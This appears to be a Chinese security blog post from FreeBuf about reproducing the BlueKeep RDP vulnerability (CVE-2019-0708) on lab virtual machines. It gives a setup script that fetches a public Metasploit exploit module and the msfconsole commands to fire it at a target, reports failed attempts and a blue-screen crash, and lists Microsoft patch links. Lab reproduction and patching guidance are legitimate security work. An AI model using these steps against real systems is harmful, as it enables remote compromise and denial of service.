freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

CVE-2019-0708复现和防御手段(原创20190913)
2019-09-13 02:40:22

一、漏洞描述

Windows系列服务器于2019年5月15号,被爆出高危漏洞,该漏洞影响范围较广如:windows2003、windows2008、windows2008 R2、windows xp系统都会遭到攻击,该服务器漏洞利用方式是通过远程桌面端口3389,RDP协议进行攻击的。

二、漏洞利用方法

为了测试方便,直接扔出自编的一个脚本,按下面步骤做就可以,使用kali linxu系统。

1.     建立一个脚本文件*.sh,同时chmod +x *.sh付给它可执行属性

2.     直接复制如下代码到*.sh,然后./*.sh运行即可准备好攻击环境(注意:脚本帮助更新了MSF,这一步是必须的!不然框架加载不进来)

#Update your MSF
apt-get update
apt-get install
metasploit-framework
#Download cve-2019-0708
git clone https://github.com/NAXG/cve_2019_0708_bluekeep_rce.git
#Mkdir for cve
mkdir –p /usr/share/metasploit-framework/lib/msf/core/exploit/
mkdir –p
/usr/share/metasploit-framework/modules/auxiliary/scanner/
mkdir –p
/usr/share/metasploit-framework/modules/exploits/windows/rdp/
mkdir –p
/usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/
#Copy .rb to target dir
cd cve_2019_0708_bluekeep_rce/
cp rdp.rb /usr/share/metasploit-framework/lib/msf/core/exploit/
cp rdp_scanner.rb /usr/share/metasploit-framework/modules/auxiliary/scanner/
cp cve_2019_0708_bluekeep_rce.rb /usr/share/metasploit-framework/modules/exploits/windows/rdp/
cp cve_2019_0708_bluekeep.rb /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/

CVE-2019-0708下载后包含2个模块,一个扫描模块cve_2019_0708_bluekeep,一个攻击模块cve_2019_0708_bluekeep_rce,直接使用攻击模块就可以。

image001.png

3.     继续如下操作即可开始测试

msfconsole

reload_all

use exploit/windows/rdp/cve_2019_0708_bluekeep_rce

set rhosts 192.168.80.111(目标IP)

set target 3(目标环境,具体用哪个看下面第二个图,或者直接在模块下输入info就行)

run

image003.png

image005.png

        三、开始测试(系统都是虚拟机)

       1.       测试winxp-sp3

       可以,XP岿然不动,稳如泰山!虽然没打几个补丁,但是一点都不虚!

image007.png

image009.png


2.       测试win7-x64-sp1

     稳如……难道这就是现实?一点也打不动……

image013.pngimage015.png

image017.png

3.       测试server2008-x64-R2-SP1

            可以的,不但没有拿到shell,还打蓝屏了,换了一个参数,打成了无响应……

image019.pngimage021.pngimage023.png

4.       测试server-2003-企业版

     打不动……好像知道了一点事情……

image025.png

image027.png

5.       测试win10-x64专业版

      当然要拿自己的机器试一下,一样没打补丁,完全打不动。


image029.pngimage031.png

四、 写在最后

       本次测试虽然没有成功复现,但是折腾之后想起来一个词“水土不服”,曾经折腾过很多渗透测试,都是因为水土不服——只有找到特定的系统,做特定的配置才能复现,有的甚至要配置特定的系统语言。

       其实本次CVE也要在2008R2上配置一些东西才能通过,但是距离真实环境太远,就没去配置,原汁原味测试一下就好啦,还有……渗透测试建议不要用这个,蓝屏谁也受不了!



附:—————— 漏洞补丁下载————————

其实用你的杀毒软件直接更新漏洞补丁更快!

1.Windows Server 2008漏洞补丁系列下载地址

Windows Server 200832位系统:

http://download.windowsupdate.com/d/msdownload/update/software/secu/2019/05/windows6.0-kb4499149-x86_832cf179b302b861c83f2a92acc5e2a152405377.msu

Windows Server 2008x64位系统:

http://download.windowsupdate.com/d/msdownload/update/software/secu/2019/05/windows6.0-kb4499149-x64_9236b098f7cea864f7638e7d4b77aa8f81f70fd6.msu

Windows Server 2008R2 Itanium系统:

http://download.windowsupdate.com/c/msdownload/update/software/secu/2019/05/windows6.1-kb4499175-ia64_fabc8e54caa0d31a5abe8a0b347ab4a77aa98c36.msu

Windows Server 2008R2 x64系统:

http://download.windowsupdate.com/d/msdownload/update/software/secu/2019/05/windows6.1-kb4499175-x64_3704acfff45ddf163d8049683d5a3b75e49***cb.msu

Windows Server 2008Itanium:

http://download.windowsupdate.com/d/msdownload/update/software/secu/2019/05/windows6.0-kb4499180-ia64_805e448d48ab8b1401377ab9845f39e1cae836d4.msu

2.Windows Server 2003漏洞补丁系列下载地址

Windows Server 200332位系统:

http://download.windowsupdate.com/d/csa/csa/secu/2019/04/windowsserver2003-kb4500331-x86-custom-chs_4892823f525d9d532ed3ae36fc440338d2b46a72.exe

Windows Server 200364位系统:

http://download.windowsupdate.com/d/csa/csa/secu/2019/04/windowsserver2003-kb4500331-x64-custom-chs_f2f949a9a764ff93ea13095a0aca1fc507320d3c.exe

3. Windows XP 漏洞补丁系列下载地址

Windows XP SP3 32位系统:

http://download.windowsupdate.com/c/csa/csa/secu/2019/04/windowsxp-kb4500331-x86-custom-chs_718543e86e06b08b568826ac13c05f967392238c.exe

Windows XP SP2 64位系统:

http://download.windowsupdate.com/d/csa/csa/secu/2019/04/windowsserver2003-kb4500331-x64-custom-enu_e2fd240c402134839cfa22227b11a5ec80ddafcf.exe

Windows XP SP3 forXPe:

http://download.windowsupdate.com/d/csa/csa/secu/2019/04/windowsxp-kb4500331-x86-embedded-custom-chs_96da48aaa9d9bcfe6cd820f239db2fe96500bfae.exe

# Metasploit # Kali # CVE # CVE-2019-0708
本文为 独立观点,未经允许不得转载,授权请联系FreeBuf客服小蜜蜂,微信:freebee2022
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
相关推荐
  • 0 文章数
  • 0 关注者